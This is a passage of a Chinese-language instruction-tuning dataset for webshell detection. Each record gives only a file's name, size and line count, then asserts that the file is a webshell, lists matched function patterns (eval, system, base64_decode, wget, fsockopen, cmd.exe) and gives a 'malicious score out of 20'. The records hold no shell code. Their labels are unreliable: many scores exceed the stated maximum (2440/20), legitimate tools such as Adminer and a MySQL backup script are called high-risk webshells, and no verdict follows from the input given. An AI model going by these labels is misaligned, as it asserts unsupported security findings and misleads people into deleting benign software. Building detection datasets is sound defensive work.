这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/myshell.php", "malicious_score": 39, "md5_hash": "83debd119718e15a4dd20f96dd4ddfd5"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"EgY_SpIdEr ShElL V2.php\", \"文件类型\": \"php\", \"文件大小\": \"311610 bytes\", \"行数\": 6146}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, $_REQUEST[, base64_decode(, file_get_contents(, $_GET[ 发现混淆技术: ord\\s*\\(, chr\\s*\\(, base64_decode 包含网络功能: wget, curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 2440/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/EgY_SpIdEr ShElL V2.php", "malicious_score": 2440, "md5_hash": "b55627e68bdb1c744384051010bd68f3"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Backdoor php v0.1 Coded By Charlichaplin.php\", \"文件类型\": \"php\", \"文件大小\": \"5765 bytes\", \"行数\": 181}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, fwrite(, fputs(, system(, $_POST[ 包含网络功能: fsockopen 具备文件操作能力: fopen\\s*\\(, unlink\\s*\\(, copy\\s*\\( 恶意度评分: 47/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/Backdoor php v0.1 Coded By Charlichaplin.php", "malicious_score": 47, "md5_hash": "e1025af8f7550461e642029741e89c83"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"hiddens shell v1.php\", \"文件类型\": \"php\", \"文件大小\": \"7236 bytes\", \"行数\": 1}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: eval(, base64_decode( 发现混淆技术: base64_decode 恶意度评分: 8/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/hiddens shell v1.php", "malicious_score": 8, "md5_hash": "c2f3327d60884561970c63ffa09439a4"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"s72 Shell v1.0 Codinf by Cr@zy_King.php\", \"文件类型\": \"php\", \"文件大小\": \"5121 bytes\", \"行数\": 141}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, system( 具备文件操作能力: copy\\s*\\( 恶意度评分: 7/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/s72 Shell v1.0 Codinf by Cr@zy_King.php", "malicious_score": 7, "md5_hash": "9136a2b2603d1f2a3daeba521537ae05"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"529.php\", \"文件类型\": \"php\", \"文件大小\": \"1581 bytes\", \"行数\": 58}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, $_GET[, exec( 包含网络功能: curl_exec 具备文件操作能力: mkdir\\s*\\( 恶意度评分: 17/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/529.php", "malicious_score": 17, "md5_hash": "fd28cf2b36ffdef0a67774908627183b"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Bnkqbakq.php\", \"文件类型\": \"php\", \"文件大小\": \"5956 bytes\", \"行数\": 14}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: eval(, base64_decode( 发现混淆技术: base64_decode, ord\\s*\\(, chr\\s*\\( 恶意度评分: 12/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/Bnkqbakq.php", "malicious_score": 12, "md5_hash": "8fac41fdc2c5363bffa85f9cfaa1b389"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Changing CHMOD Permissions Exploit.php\", \"文件类型\": \"php\", \"文件大小\": \"800 bytes\", \"行数\": 24}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, fputs( 具备文件操作能力: fopen\\s*\\( 恶意度评分: 13/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/Changing CHMOD Permissions Exploit.php", "malicious_score": 13, "md5_hash": "780a3c7b5742b1e0ba767f20cdfffab9"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"sosyete.php\", \"文件类型\": \"php\", \"文件大小\": \"7898 bytes\", \"行数\": 221}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, shell_exec(, exec( 恶意度评分: 18/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/sosyete.php", "malicious_score": 18, "md5_hash": "3feaebedd3ae2f2d2689df5796970436"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"sure.php\", \"文件类型\": \"php\", \"文件大小\": \"10988 bytes\", \"行数\": 3}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: eval(, base64_decode( 发现混淆技术: base64_decode 恶意度评分: 8/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/sure.php", "malicious_score": 8, "md5_hash": "59d9dd1c7efa58dbec5a72a365022481"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Carbylamine PHP Encoder.php\", \"文件类型\": \"php\", \"文件大小\": \"3441 bytes\", \"行数\": 103}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, gzinflate(, eval(, base64_decode( 发现混淆技术: base64_decode, gzinflate, ord\\s*\\( 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\( 恶意度评分: 25/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/Carbylamine PHP Encoder.php", "malicious_score": 25, "md5_hash": "61d458119ef55448e2716a4e1de488a2"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"WordPress Shell.php\", \"文件类型\": \"php\", \"文件大小\": \"797 bytes\", \"行数\": 18}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, system( 恶意度评分: 15/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/WordPress Shell.php", "malicious_score": 15, "md5_hash": "e82b33ff66d82602af04091d2f833cf2"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"cw.php\", \"文件类型\": \"php\", \"文件大小\": \"41723 bytes\", \"行数\": 766}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_get_contents(, $_GET[, fwrite(, $_POST[, exec( 发现混淆技术: base64_decode 包含网络功能: fsockopen 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 279/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/cw.php", "malicious_score": 279, "md5_hash": "136255faa8d299601904ddd19305370b"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Coppermine Photo Gallery = 1.4.3 remote cmmnds xctn.php\", \"文件类型\": \"php\", \"文件大小\": \"17659 bytes\", \"行数\": 419}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: passthru(, $_POST[, fputs( 发现混淆技术: ord\\s*\\(, chr\\s*\\( 包含网络功能: fsockopen, socket_create 具备文件操作能力: fopen\\s*\\( 恶意度评分: 37/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/Coppermine Photo Gallery = 1.4.3 remote cmmnds xctn.php", "malicious_score": 37, "md5_hash": "5937b131b67d8e0afdbd589251a5e176"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"bdotw44shell.php\", \"文件类型\": \"php\", \"文件大小\": \"3188 bytes\", \"行数\": 129}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, exec(, system(, eval(, passthru( 包含网络功能: curl_exec 具备文件操作能力: mkdir\\s*\\( 恶意度评分: 44/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/bdotw44shell.php", "malicious_score": 44, "md5_hash": "4f71ce0cf112207fc7730784c614ca13"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"wordpress backdoor.php\", \"文件类型\": \"php\", \"文件大小\": \"598 bytes\", \"行数\": 14}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[ 恶意度评分: 12/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/wordpress backdoor.php", "malicious_score": 12, "md5_hash": "a52343f4380933574b9196616359ca01"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"W3D Shell.php\", \"文件类型\": \"php\", \"文件大小\": \"3955 bytes\", \"行数\": 128}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, $_COOKIE[, $_REQUEST[, $_GET[ 恶意度评分: 30/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/W3D Shell.php", "malicious_score": 30, "md5_hash": "987f66b29bfb209a0b4f097f84f57c3b"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Serv-U本地权限提升工具.php\", \"文件类型\": \"php\", \"文件大小\": \"8998 bytes\", \"行数\": 250}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, file_get_contents(, $_COOKIE[, $_POST[, fputs ( 包含网络功能: fsockopen 具备文件操作能力: move_uploaded_file 恶意度评分: 212/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/Serv-U本地权限提升工具.php", "malicious_score": 212, "md5_hash": "e6d12f37dd61e19657528facfe23b3f5"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"rootshell.php\", \"文件类型\": \"php\", \"文件大小\": \"13389 bytes\", \"行数\": 349}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, system(, $_POST[, file_get_contents( 具备文件操作能力: fopen\\s*\\(, unlink\\s*\\(, copy\\s*\\( 恶意度评分: 37/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/rootshell.php", "malicious_score": 37, "md5_hash": "0459e16641b0e4b828a9aa6e0da8c2e6"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"soldierofallah.php\", \"文件类型\": \"php\", \"文件大小\": \"36549 bytes\", \"行数\": 1303}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, fwrite(, $_POST[, exec(, system( 具备文件操作能力: fopen\\s*\\(, move_uploaded_file, unlink\\s*\\( 恶意度评分: 94/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/soldierofallah.php", "malicious_score": 94, "md5_hash": "967cdf2c0c023b2b0bc3236b904c7a4a"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"r57.biz Dq99Shell.php\", \"文件类型\": \"php\", \"文件大小\": \"164075 bytes\", \"行数\": 3112}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, $_REQUEST[, file_get_contents(, $_GET[, fwrite( 发现混淆技术: base64_decode, ord\\s*\\(, chr\\s*\\( 包含网络功能: wget 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 248/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/r57.biz Dq99Shell.php", "malicious_score": 248, "md5_hash": "9d739d2512502fa38c7340e41a09f643"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Macker's Private PHPShell.php\", \"文件类型\": \"php\", \"文件大小\": \"40256 bytes\", \"行数\": 2026}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: passthru(, fwrite(, system(, exec( 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 17/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/Macker's Private PHPShell.php", "malicious_score": 17, "md5_hash": "e24cbf0e294da9ac2117dc660d890bb9"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"h4ntu shell [powered by tsoi].php\", \"文件类型\": \"php\", \"文件大小\": \"2475 bytes\", \"行数\": 78}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, system(, exec( 恶意度评分: 12/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/h4ntu shell [powered by tsoi].php", "malicious_score": 12, "md5_hash": "06ed0b2398f8096f1bebf092d0526137"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"client2.php\", \"文件类型\": \"php\", \"文件大小\": \"3786 bytes\", \"行数\": 170}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_get_contents(, $_GET[, exec(, system(, $_POST[ 发现混淆技术: base64_decode, ord\\s*\\(, chr\\s*\\( 恶意度评分: 51/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/中转bypass/client2.php", "malicious_score": 51, "md5_hash": "c04819ebb9354d7313bf254859e8e292"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"client1.php\", \"文件类型\": \"php\", \"文件大小\": \"683 bytes\", \"行数\": 22}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, file_get_contents(, base64_decode( 发现混淆技术: base64_decode 恶意度评分: 14/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/中转bypass/client1.php", "malicious_score": 14, "md5_hash": "60ec925c70aa37d9ab83e851a7d9ba01"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"server1.php\", \"文件类型\": \"php\", \"文件大小\": \"53 bytes\", \"行数\": 1}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, base64_decode( 发现混淆技术: base64_decode 恶意度评分: 8/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/中转bypass/server1.php", "malicious_score": 8, "md5_hash": "732050287ae1d36a923138e2b2eb2352"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"server2.php\", \"文件类型\": \"php\", \"文件大小\": \"1204 bytes\", \"行数\": 65}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: base64_decode( 发现混淆技术: base64_decode, ord\\s*\\(, chr\\s*\\( 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/中转bypass/server2.php", "malicious_score": 9, "md5_hash": "776aa0c0890946117b71069747dc6b27"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"ntunnel_mysql.php\", \"文件类型\": \"php\", \"文件大小\": \"12106 bytes\", \"行数\": 440}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, exec(, base64_decode( 发现混淆技术: base64_decode, pack\\s*\\(, chr\\s*\\( 恶意度评分: 72/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/数据库/ntunnel_mysql.php", "malicious_score": 72, "md5_hash": "d32d1d2d841faff5de02b7967524849b"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Adminer - Compact database management.php\", \"文件类型\": \"php\", \"文件大小\": \"301404 bytes\", \"行数\": 3400}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, file_get_contents(, fwrite(, $_COOKIE[, $_POST[ 发现混淆技术: unpack\\s*\\(, base64_decode, pack\\s*\\( 具备文件操作能力: fopen\\s*\\(, unlink\\s*\\(, fwrite\\s*\\( 恶意度评分: 1445/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/数据库/Adminer - Compact database management.php", "malicious_score": 1445, "md5_hash": "1dcfc64b94261c9b8fb49cc3a602a92e"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"php MySQL Database Backup Script.php\", \"文件类型\": \"php\", \"文件大小\": \"3266 bytes\", \"行数\": 73}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, fputs(, base64_decode( 发现混淆技术: base64_decode 具备文件操作能力: fopen\\s*\\( 恶意度评分: 27/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/数据库/php MySQL Database Backup Script.php", "malicious_score": 27, "md5_hash": "49fc50f2d7258d0e901495b62bf994c6"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"code.php\", \"文件类型\": \"php\", \"文件大小\": \"35328 bytes\", \"行数\": 1033}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, file_get_contents(, $_COOKIE[, eval(, $_POST[ 具备文件操作能力: mkdir\\s*\\(, move_uploaded_file, unlink\\s*\\( 恶意度评分: 148/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/blackbin/v1/code.php", "malicious_score": 148, "md5_hash": "a444014c134ff24c0be5a05c02b81a79"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"dev_core.php\", \"文件类型\": \"php\", \"文件大小\": \"7037 bytes\", \"行数\": 239}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, $_COOKIE[, fwrite(, eval(, $_POST[ 发现混淆技术: pack\\s*\\( 包含网络功能: fsockopen 具备文件操作能力: file_put_contents, fwrite\\s*\\( 恶意度评分: 38/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/blackbin/v1/dev_core.php", "malicious_score": 38, "md5_hash": "55ad9309b006884f660c41e53150fc2e"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"server.php\", \"文件类型\": \"php\", \"文件大小\": \"274 bytes\", \"行数\": 9}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_COOKIE[, create_function(, base64_decode( 发现混淆技术: base64_decode 恶意度评分: 11/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/bns-php-shell/server.php", "malicious_score": 11, "md5_hash": "53491c197fd3c2d6ed2e29d874cbc7ab"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"client.php\", \"文件类型\": \"php\", \"文件大小\": \"16358 bytes\", \"行数\": 389}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, file_get_contents(, create_function(, $_COOKIE[, exec( 发现混淆技术: base64_decode 包含网络功能: curl_exec 具备文件操作能力: unlink\\s*\\(, file_put_contents 恶意度评分: 71/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/bns-php-shell/client.php", "malicious_score": 71, "md5_hash": "079e18fb7b9d158030e9db2016df15f3"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"one.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"6287 bytes\", \"行数\": 60}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 包含网络功能: HttpURLConnection 具备文件操作能力: mkdir\\s*\\( 恶意度评分: 23/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/war/one/one.jsp", "malicious_score": 23, "md5_hash": "487049912197920654ae8291ed566bb9"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"one1.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"6287 bytes\", \"行数\": 60}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 包含网络功能: HttpURLConnection 具备文件操作能力: mkdir\\s*\\( 恶意度评分: 23/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/war/one/one1.jsp", "malicious_score": 23, "md5_hash": "487049912197920654ae8291ed566bb9"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"css.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"139006 bytes\", \"行数\": 3294}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 462/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/war/one/css.jsp", "malicious_score": 462, "md5_hash": "6a44f2ca3096a5b7ff11f4e5315409e6"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"css1.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"59158 bytes\", \"行数\": 1808}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 发现混淆技术: ord\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 175/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/war/one/css1.jsp", "malicious_score": 175, "md5_hash": "d699b6cf83a627ba3621ba92db11cd1b"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"tunnel.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"4876 bytes\", \"行数\": 127}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Request.QueryString, Response.Write 具备文件操作能力: copy\\s*\\( 恶意度评分: 13/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/reGeorg-master/tunnel.aspx", "malicious_score": 13, "md5_hash": "92c5289914bc4f9abf80eea94b6ac5c1"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"xxooxx.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"70029 bytes\", \"行数\": 2581}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: wscript.shell, execute(, Response.Write, cmd.exe 发现混淆技术: chr\\s*\\( 具备文件操作能力: copy\\s*\\( 恶意度评分: 36/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Aspx/xxooxx.aspx", "malicious_score": 36, "md5_hash": "853d91aa5a833db0c24837477b0a1ad0"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"AspxSpy2014Final.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"112736 bytes\", \"行数\": 2965}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: wscript.shell, execute(, Response.Write, cmd.exe 发现混淆技术: chr\\s*\\( 具备文件操作能力: copy\\s*\\( 恶意度评分: 54/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Aspx/AspxSpy2014Final.aspx", "malicious_score": 54, "md5_hash": "461fce4f12a3ad5fba6d641291c89ec9"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"凝聚科技专用AspX大马 Bysunue.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"27229 bytes\", \"行数\": 900}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Request.QueryString, cmd.Exe, Response.Write, cmd.exe 具备文件操作能力: copy\\s*\\( 恶意度评分: 277/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Aspx/凝聚科技专用AspX大马 Bysunue.aspx", "malicious_score": 277, "md5_hash": "378aa33219c69b43a7d674368ba7ae36"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"MYSQL Manager -Asp.net Silic Group Hacker Army专用版本.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"41403 bytes\", \"行数\": 1053}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Request.QueryString, Response.Write, Request.Form 恶意度评分: 126/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Aspx/MYSQL Manager -Asp.net Silic Group Hacker Army专用版本.aspx", "malicious_score": 126, "md5_hash": "1389c733e6e748ed581a1350ffc05b8c"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"devilzShell.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"65042 bytes\", \"行数\": 1244}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Request.QueryString, Response.Write, Request.Form 发现混淆技术: base64_decode, chr\\s*\\( 具备文件操作能力: mkdir\\s*\\( 恶意度评分: 155/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Aspx/devilzShell.aspx", "malicious_score": 155, "md5_hash": "7981f1bf9b8e5f4691e4ac440f1ba251"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"WebAdmin 2.X Final.aspx\", 